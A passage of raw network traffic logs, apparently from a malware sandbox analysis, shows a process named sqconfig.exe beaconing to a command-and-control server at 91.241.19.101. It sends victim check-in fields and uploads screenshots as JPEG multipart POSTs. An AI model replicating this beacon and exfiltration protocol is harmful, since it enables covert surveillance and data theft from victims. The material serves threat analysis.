                                                                  Sep 30, 2021 23:54:15.442673922 CEST21395OUTData Raw: a6 05 37 42 27 95 99 42 4f 13 26 8b 38 a4 35 45 af f1 d0 54 2d 7e e7 a5 76 f2 33 91 50 93 35 3e 5f 5a 43 24 63 a9 ac 66 ba 90 f7 a8 cc ae 7b d3 e4 34 58 77 d4 db 37 51 2f 61 51 b6 a2 ab d3 15 8d 92 7b d1 c9 a3 91 1a 2a 09 1a 6d aa 31 e9 50 3e a1
                                                                  Data Ascii: 7B'BO&85ET-~v3P5>_ZC$cf{4Xw7Q/aQ{*m1P>!TdTCURiUYZ(P0JQ@RR$Z1J\N@4v(-1Q@\j~f_j[pZh_U_KefqO;pkvxgQLAKIKLi(Ei;L.P)h!(
                                                                  Sep 30, 2021 23:54:15.629096031 CEST21396INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  249192.168.2.35008591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:15.523852110 CEST21396OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:15.726133108 CEST21397INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  25192.168.2.34978591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:57.181083918 CEST7965OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----c9932e640ba65e6431bee773009921f9
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 92984
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:52:57.181211948 CEST7965OUTData Raw: 2d 2d 2d 2d 2d 2d 63 39 39 33 32 65 36 34 30 62 61 36 35 65 36 34 33 31 62 65 65 37 37 33 30 30 39 39 32 31 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------c9932e640ba65e6431bee773009921f9Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:52:57.181406975 CEST7975OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:52:57.182215929 CEST7978OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:52:57.307173014 CEST7999OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:52:57.307221889 CEST8011OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:52:57.307334900 CEST8016OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:52:57.431503057 CEST8045OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:52:57.431535959 CEST8047OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:52:57.431554079 CEST8055OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:52:57.431571007 CEST8058OUTData Raw: a6 b7 01 c3 a5 25 28 a4 3d 69 bd 84 14 52 52 8e b4 80 70 a7 81 4d 14 b5 68 97 b8 bc 52 d2 67 de 8a 60 3a 96 90 50 29 a2 47 51 49 4b 4c 41 40 a2 8a 62 1e 39 a5 a6 8e 94 e0 69 a1 0b 4b da 9b 9a 75 51 21 4e a6 8a 70 a6 26 2d 2d 14 76 a6 48 b4 66 90
                                                                  Data Ascii: %(=iRRpMhRg`:P)GQIKLA@b9iKuQ!Np&--vHfRJZhC-5iD1)RR\R:TH-|-D>KDE JD)S)M8qV~<t-?3iE1)q Su%-4&>SUf2SDH)4jcSPh4i(L
                                                                  Sep 30, 2021 23:52:57.749624014 CEST8113INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  250192.168.2.35008691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:15.967144012 CEST21398OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:16.144932985 CEST21437INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  251192.168.2.35008791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:15.971404076 CEST21398OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----29afdbb94f80a2306c3816166cb68807
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86667
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:15.971616030 CEST21398OUTData Raw: 2d 2d 2d 2d 2d 2d 32 39 61 66 64 62 62 39 34 66 38 30 61 32 33 30 36 63 33 38 31 36 31 36 36 63 62 36 38 38 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------29afdbb94f80a2306c3816166cb68807Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:15.972095013 CEST21408OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:15.972860098 CEST21411OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:16.098675966 CEST21414OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:16.098967075 CEST21417OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:54:16.099030018 CEST21427OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:54:16.099091053 CEST21431OUTData Raw: 37 52 07 11 49 83 8f 94 0e 47 23 b5 73 56 a2 ea bb 45 5a df 89 8e 2e 93 ad 47 95 4b 5b df f3 3b 3b 3b 49 35 0b c8 ad 62 fb d2 36 33 e8 3b 9f c0 57 a8 da db 45 67 6b 15 b4 2b b6 38 d7 6a 8a f0 0d 2b c7 da b6 93 24 92 41 15 9b c8 eb b7 7c 91 92 40
                                                                  Data Ascii: 7RIG#sVEZ.GK[;;;I5b63;WEgk+8j+$A|@k1W,0bR=MxxtT4)GY[Mi/$&DC^6(WRRtob1>i3ASuZgL\`KEPIfKa^"^5yt
                                                                  Sep 30, 2021 23:54:16.099455118 CEST21434OUTData Raw: 4a d6 d3 ef 2e 1e 45 f9 b1 ec 05 73 d5 af 52 2a e9 1b d1 50 a9 3e 56 cc eb 8f 07 6a 6b a6 8b a6 88 00 3a a6 79 c7 ad 73 92 44 23 e0 d7 ba af cf a1 b6 fc 37 ee ce 73 5e 2b a9 2a fd a2 4d aa 00 dc 46 2b 9b 2f c5 ce bb 92 9f 43 d1 cc 30 90 c3 72 72
                                                                  Data Ascii: J.EsR*P>Vjk:ysD#7s^+*MF+/C0rr=7"jz=~L8]\S +q_Ru'.y=X1$V;cBuOEUw$wIqIsc*#q+usV$g_5YN[\fNj
                                                                  Sep 30, 2021 23:54:16.099483967 CEST21437OUTData Raw: d8 fa 4e df 8d 2e 5c 42 da 43 f6 d8 59 6f 16 86 49 e1 ed 42 3f f9 62 4f d2 ab 3e 9b 77 1f de 81 ff 00 2a d8 8f c4 97 a9 d4 ab 0f 7a b7 1f 8a 5b a4 b0 a9 a3 da e2 63 bc 53 1a 8e 12 5b 49 a3 96 30 c8 bd 63 61 f8 53 70 45 76 4b af 58 cb c4 96 eb cf
                                                                  Data Ascii: N.\BCYoIB?bO>w*z[cS[I0caSpEvKXIhT~Q|P-`(f+:V8X/|1c ?>/-Zg$$k/S<]XE9cg$D5WrfC^*e^?p9=,z|\|;+$I}b=q\
                                                                  Sep 30, 2021 23:54:16.226246119 CEST21440OUTData Raw: 29 94 e1 d2 82 45 cd 38 1a 66 69 45 31 0f a5 1d a9 bd a9 c2 ad 12 3b bd 2d 36 94 53 42 16 8a 3b d2 d3 10 f4 a7 d3 07 14 a4 d5 a2 18 ed d9 38 a7 0a 62 0c 9a b0 23 c0 e6 a9 2b 93 26 90 d0 33 4a 16 a4 00 53 86 2b 4b 19 b9 0c 0b 8a 7a f1 4b 49 9a 69
                                                                  Data Ascii: )E8fiE1;-6SB;8b#+&3JS+KzKIi{QIKLC/jh< ng@Yhi$@3Rcl(S$JxNS612\pA%-17&FDQ\_;EnrE%-ZJZB
                                                                  Sep 30, 2021 23:54:16.411686897 CEST21487INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  252192.168.2.35008891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:16.390053988 CEST21486OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:16.599977016 CEST21487INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:54:16.610910892 CEST21487OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:16.611107111 CEST21488OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:16.611299038 CEST21498OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:16.611433983 CEST21500OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:16.735897064 CEST21506OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:16.735960960 CEST21511OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:54:16.736301899 CEST21524OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:54:16.736351967 CEST21527OUTData Raw: 1b b9 5f ba 43 55 77 d1 2f 13 fe 59 67 e9 54 b1 34 de cc 87 82 ad 1d d1 98 bd 71 4f c5 59 6d 3e e1 3a c2 c3 f0 a6 18 64 1d 50 8f c2 ab da 45 ec c5 ec 66 b7 44 60 66 a4 14 6d 22 94 0c d1 72 94 5a 1d 4a 29 31 4e 02 a6 e5 0a 29 d4 80 52 81 52 cb 48
                                                                  Data Ascii: _CUw/YgT4qOYm>:dPEfD`fm"rZJ)1N)RRHP)S@Z|A?.kA?/O?:{?KIid<#a{xV@X9w* ^o""g_03L#1'$9$5utf-Y4QLQ`y |+,|Av
                                                                  Sep 30, 2021 23:54:16.861104965 CEST21531OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:54:16.861198902 CEST21538OUTData Raw: 21 cc 8b f5 ae 1c 27 f0 5f ab 3e 8e af c6 bd 11 ec fa a7 1a 16 93 ff 00 5c 47 f2 ac 5e f5 b7 ab 71 a3 69 43 fe 98 8f e4 2b 0e b9 70 bf c3 fb ca c7 ff 00 1b ee 17 14 b8 34 99 a5 cd 74 9c 61 4f 14 ca 50 6a 46 89 29 69 a0 d2 f7 a4 5a 14 53 85 37 34
                                                                  Data Ascii: !'_>\G^qiC+p4taOPjF)iZS74H;((R!iT!HRLu0Z&* qR)C5C\T8u)yz5_7uCj-JP;Y0M&MsQQ(7xxt+2JQQo
                                                                  Sep 30, 2021 23:54:16.861290932 CEST21549OUTData Raw: 4d 14 e1 40 98 ea 29 33 4a 29 92 3a 8a 43 45 02 62 d1 45 28 a0 46 c7 87 bf e3 fd bf eb 99 aa 6d f7 db eb 56 f4 0f f8 fe 6f fa e6 6a a3 7d f6 fa 9a c2 3f c5 63 a9 fc 34 25 2d 1d a8 15 b9 ce 2d 3a 9b 4e a4 48 53 a9 05 2d 4b 10 a2 8a 4a 5a 09 0a 28
                                                                  Data Ascii: M@)3J):CEbE(FmVoj}?c4%--:NHS-KJZ(F(bG47(BV>F8I{NgnTK%?,=yKoWDY[[_;>kq{st^*t$gBfKSi4\p4
                                                                  Sep 30, 2021 23:54:17.095443010 CEST21575INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:17 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  253192.168.2.35008991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:16.853188038 CEST21528OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:17.062782049 CEST21574INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  254192.168.2.35009091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
